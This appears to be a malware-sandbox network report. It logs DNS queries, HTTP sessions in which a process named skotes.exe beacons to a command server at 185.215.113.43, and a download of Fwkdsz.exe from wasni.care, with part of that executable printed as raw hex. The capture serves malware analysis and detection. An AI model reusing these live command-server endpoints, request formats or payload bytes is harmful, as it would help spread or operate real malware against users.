                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366389036 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366429090 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366506100 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366517067 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366523027 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366527081 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.841264963 CET192.168.2.41.1.1.10xeb6eStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.216448069 CET192.168.2.41.1.1.10xb2Standard query (0)wasni.careA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.925303936 CET192.168.2.41.1.1.10xa330Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.940561056 CET192.168.2.41.1.1.10xe589Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.952163935 CET192.168.2.41.1.1.10x8c13Standard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.963213921 CET192.168.2.41.1.1.10xe3b7Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.017132044 CET192.168.2.41.1.1.10xab66Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:37.207535028 CET192.168.2.41.1.1.10xf5ddStandard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:37.218632936 CET192.168.2.41.1.1.10x600cStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.208281040 CET192.168.2.41.1.1.10x5398Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.215375900 CET192.168.2.41.1.1.10xe42bStandard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.218074083 CET192.168.2.41.1.1.10x52bdStandard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.227694035 CET192.168.2.41.1.1.10x1e92Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.227860928 CET192.168.2.41.1.1.10xb04fStandard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.242348909 CET192.168.2.41.1.1.10x79efStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.623744011 CET192.168.2.41.1.1.10x18a2Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.625060081 CET192.168.2.41.1.1.10x2565Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.631187916 CET192.168.2.41.1.1.10x3007Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.633806944 CET192.168.2.41.1.1.10xa32aStandard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.650507927 CET192.168.2.41.1.1.10x258eStandard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.651664972 CET192.168.2.41.1.1.10xefb4Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.043507099 CET192.168.2.41.1.1.10xda8bStandard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.048475981 CET192.168.2.41.1.1.10xdf4cStandard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.057795048 CET192.168.2.41.1.1.10xcae6Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.063597918 CET192.168.2.41.1.1.10xf7abStandard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.097333908 CET192.168.2.41.1.1.10x950eStandard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.145325899 CET192.168.2.41.1.1.10xdcfcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.388870955 CET192.168.2.41.1.1.10x1f26Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.389791965 CET192.168.2.41.1.1.10xf2c4Standard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:52.476608992 CET192.168.2.41.1.1.10x3671Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.340404034 CET192.168.2.41.1.1.10x9c85Standard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:12.972547054 CET1.1.1.1192.168.2.40xd766No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:12.972547054 CET1.1.1.1192.168.2.40xd766No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:13.644421101 CET1.1.1.1192.168.2.40x302No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:13.644421101 CET1.1.1.1192.168.2.40x302No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:27.218357086 CET1.1.1.1192.168.2.40x810bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:27.218357086 CET1.1.1.1192.168.2.40x810bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.862149954 CET1.1.1.1192.168.2.40xeb6eName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.698889971 CET1.1.1.1192.168.2.40x4c7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.698889971 CET1.1.1.1192.168.2.40x4c7No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.358567953 CET1.1.1.1192.168.2.40xb2No error (0)wasni.care208.109.77.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.934004068 CET1.1.1.1192.168.2.40xa330Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.949677944 CET1.1.1.1192.168.2.40xe589Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.961160898 CET1.1.1.1192.168.2.40x8c13Name error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:18.978276014 CET1.1.1.1192.168.2.40xe3b7Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.028845072 CET1.1.1.1192.168.2.40xab66No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:19.028845072 CET1.1.1.1192.168.2.40xab66No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:37.202985048 CET1.1.1.1192.168.2.40x7e00No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:37.214975119 CET1.1.1.1192.168.2.40xf5ddNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.215701103 CET1.1.1.1192.168.2.40x5398No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.215701103 CET1.1.1.1192.168.2.40x5398No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.222143888 CET1.1.1.1192.168.2.40xe42bNo error (0)youtube.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.225100040 CET1.1.1.1192.168.2.40x52bdNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.234468937 CET1.1.1.1192.168.2.40xb04fNo error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.234479904 CET1.1.1.1192.168.2.40x1e92No error (0)youtube.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:42.249336004 CET1.1.1.1192.168.2.40x79efNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.630275011 CET1.1.1.1192.168.2.40x18a2No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.631866932 CET1.1.1.1192.168.2.40x2565No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.631866932 CET1.1.1.1192.168.2.40x2565No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.637933016 CET1.1.1.1192.168.2.40x3007No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.640361071 CET1.1.1.1192.168.2.40xa32aNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.039949894 CET1.1.1.1192.168.2.40x2ea7No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.039949894 CET1.1.1.1192.168.2.40x2ea7No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.050573111 CET1.1.1.1192.168.2.40xda8bNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.055447102 CET1.1.1.1192.168.2.40xdf4cNo error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.055447102 CET1.1.1.1192.168.2.40xdf4cNo error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.055447102 CET1.1.1.1192.168.2.40xdf4cNo error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.070589066 CET1.1.1.1192.168.2.40xf7abNo error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.104463100 CET1.1.1.1192.168.2.40x950eNo error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.151946068 CET1.1.1.1192.168.2.40xdcfcNo error (0)www.google.com216.58.212.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.395540953 CET1.1.1.1192.168.2.40x1f26No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.396394014 CET1.1.1.1192.168.2.40xf2c4No error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.396394014 CET1.1.1.1192.168.2.40xf2c4No error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:52.483988047 CET1.1.1.1192.168.2.40x3671No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:52.483988047 CET1.1.1.1192.168.2.40x3671No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.347682953 CET1.1.1.1192.168.2.40x9c85No error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.463773185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.795835018 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.735408068 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:05 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.463787185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:07.257410049 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.209477901 CET656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 31 64 31 0d 0a 20 3c 63 3e 31 30 30 33 33 33 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 39 62 35 62 30 30 66 35 39 30 35 30 33 33 36 64 30 31 32 62 62 32 34 33 66 61 64 36 64 34 61 62 61 34 65 37 61 34 63 37 37 30 39 33 34 35 35 66 66 31 37 35 66 33 34 37 34 30 35 66 34 66 64 36 64 39 66 63 31 64 23 31 30 30 33 33 34 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 33 33 34 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 33 33 34 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 1d1 <c>1003334001+++b5937c1a99d5f99b5b00f59050336d012bb243fad6d4aba4e7a4c77093455ff175f347405f4fd6d9fc1d#1003343001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1003344001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1003345001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1003346001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.463794208.109.77.116805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:08.365917921 CET60OUTGET /panel/uploads/Fwkdsz.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: wasni.care
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037825108 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:08 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 04:46:29 GMT
                                                                                                                                                                                                                                              ETag: "160032-369d8-625e6bc2addf2"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 223704
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 eb 9f 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1a 02 00 00 2c 01 00 00 00 00 00 ee 39 02 00 00 20 00 00 00 40 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 39 02 00 53 00 00 00 00 40 02 00 ce 28 01 00 00 00 00 00 00 00 00 00 00 48 03 00 d8 21 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL%g,9 @@ `9S@(H! H.text `.rsrc(@*@@.relocF@B9H4d+c:(-}*>(.}*Vo/(0}*B(0}*(1rEp(2o3}*jrSp{o4(5*{*(9T8JXTJX((=-*"(*2s(*J(o(*6s
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037837982 CET1236INData Raw: 28 14 00 00 06 2a 52 02 03 28 1f 00 00 06 03 28 20 00 00 06 04 28 16 00 00 06 2a 3a 02 03 04 73 e3 03 00 06 28 16 00 00 06 2a 76 02 03 04 28 21 00 00 06 05 28 78 00 00 06 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 1e 02
                                                                                                                                                                                                                                              Data Ascii: (*R(( (*:s(*v(!(x}}*{*{*"(*"(*2s(#*J(o(%*6s(%*R(/(0('*:s('*v(1(x}}*{*{*"(-*
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037847996 CET1236INData Raw: 02 28 88 00 00 06 2a 16 2a 8e 18 8d 01 00 00 01 25 16 02 28 a9 05 00 06 8c 45 00 00 01 a2 25 17 02 7b 1c 00 00 04 a2 28 b8 01 00 06 2a 4a 02 7b 1c 00 00 04 03 7b 1c 00 00 04 6f 96 00 00 0a 2a 1e 02 7b 97 00 00 0a 2a 1e 02 7b 98 00 00 0a 2a 1e 02
                                                                                                                                                                                                                                              Data Ascii: (**%(E%{(*J{{o*{*{*{*{*:{(**6{o*{'ooN:*{'oooN**{"o{#o{$o{%o{&o
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037961960 CET1236INData Raw: 33 00 00 04 02 7c 33 00 00 04 28 d6 00 00 0a 2a 4a 02 7b 2c 00 00 04 02 28 e0 00 00 06 6f d7 00 00 0a 2a 4a 02 7b 2c 00 00 04 02 28 e1 00 00 06 6f d7 00 00 0a 2a b6 02 7c 34 00 00 04 28 d4 00 00 0a 3a 11 00 00 00 02 02 28 fe 00 00 06 73 d5 00 00
                                                                                                                                                                                                                                              Data Ascii: 3|3(*J{,(o*J{,(o*|4(:(s}4|4(*|7(:((ZYs}7|7(*|5(:(s}5|5(*6 (*~#D(*e(
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037977934 CET848INData Raw: 46 00 00 04 2a 4a 02 28 79 00 00 06 02 7b 45 00 00 04 6f 26 02 00 06 2a 4a 02 28 79 00 00 06 02 28 5a 01 00 06 6f 31 02 00 06 2a 4a 02 28 79 00 00 06 02 7b 47 00 00 04 6f 26 02 00 06 2a 4a 02 28 79 00 00 06 02 28 5c 01 00 06 6f 31 02 00 06 2a 6e
                                                                                                                                                                                                                                              Data Ascii: F*J(y{Eo&*J(y(Zo1*J(y{Go&*J(y(\o1*n(9u(`**{E{E(9#{F{F@{G{G(**(9(o(d*~C*Fo(l*(9(o
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037987947 CET1236INData Raw: 73 e3 03 00 06 28 91 01 00 06 2a 2e 02 03 04 17 05 28 a3 01 00 06 2a 1e 02 28 a5 01 00 06 2a 1e 02 28 a7 01 00 06 2a 1e 02 28 aa 01 00 06 2a 1e 02 28 ab 01 00 06 2a 3a 02 28 7a 00 00 06 17 59 1c 5d 16 fe 01 2a 22 02 15 28 9b 01 00 06 2a 22 02 17
                                                                                                                                                                                                                                              Data Ascii: s(*.(*(*(*(*(*:(zY]*"(*"(*((oK(oK(oU*>s(*oo!o"((*>s(*2(*(((oK
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.037996054 CET212INData Raw: 05 28 30 00 00 0a 02 03 7d 6d 00 00 04 2a a6 02 03 04 28 31 00 00 0a 02 03 72 45 01 00 70 d0 03 00 00 01 28 32 00 00 0a 6f 33 00 00 0a a5 03 00 00 01 7d 6d 00 00 04 2a 6a 03 72 53 01 00 70 02 7b 6d 00 00 04 6f 34 00 00 0a 02 03 04 28 35 00 00 0a
                                                                                                                                                                                                                                              Data Ascii: (0}m*(1rEp(2o3}m*jrSp{mo4(5*{m*2s(*J(o(*6s(*o!o"o%o#o$(*Ns(*F
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.038005114 CET1236INData Raw: 06 28 ec 02 00 06 2a 1e 02 28 ed 02 00 06 2a 1e 02 28 ee 02 00 06 2a 1e 02 28 ef 02 00 06 2a 1e 02 28 f0 02 00 06 2a 1e 02 28 f1 02 00 06 2a 22 02 15 28 e3 02 00 06 2a 22 02 17 28 e3 02 00 06 2a 3a 02 03 04 73 e3 03 00 06 28 e6 02 00 06 2a b2 02
                                                                                                                                                                                                                                              Data Ascii: (*(*(*(*(*(*"(*"(*:s(*o!o"o%o#o$(*Vs(*J(*Vs(*{r*n(9uG(**{q{q(9
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.038016081 CET1236INData Raw: 28 4f 03 00 06 2a 1e 02 28 53 03 00 06 2a 1e 02 28 56 03 00 06 2a 1e 02 28 57 03 00 06 2a 3a 02 28 7a 00 00 06 17 59 19 5d 16 fe 01 2a 22 02 15 28 46 03 00 06 2a 22 02 17 28 46 03 00 06 2a ae 03 02 28 41 03 00 06 03 02 28 85 05 00 06 6f 4b 02 00
                                                                                                                                                                                                                                              Data Ascii: (O*(S*(V*(W*:(zY]*"(F*"(F*(A(oK(oK(oU*>s(I*oo!o"((K*>s(K*2(O*(W(Y(oK(oK(oV*>
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.038032055 CET1236INData Raw: 70 6f 03 01 00 0a 18 8d 01 00 00 01 25 16 02 8c 45 00 00 01 a2 25 17 03 8c 45 00 00 01 a2 28 86 03 00 06 2a b6 7e 95 00 00 04 72 75 06 00 70 6f 03 01 00 0a 18 8d 01 00 00 01 25 16 02 8c 45 00 00 01 a2 25 17 03 8c 45 00 00 01 a2 28 86 03 00 06 2a
                                                                                                                                                                                                                                              Data Ascii: po%E%E(*~rupo%E%E(*~rpo%E%E(*~rpo%%(*~rpo%E%(*B~rpo*B~r/po*B~
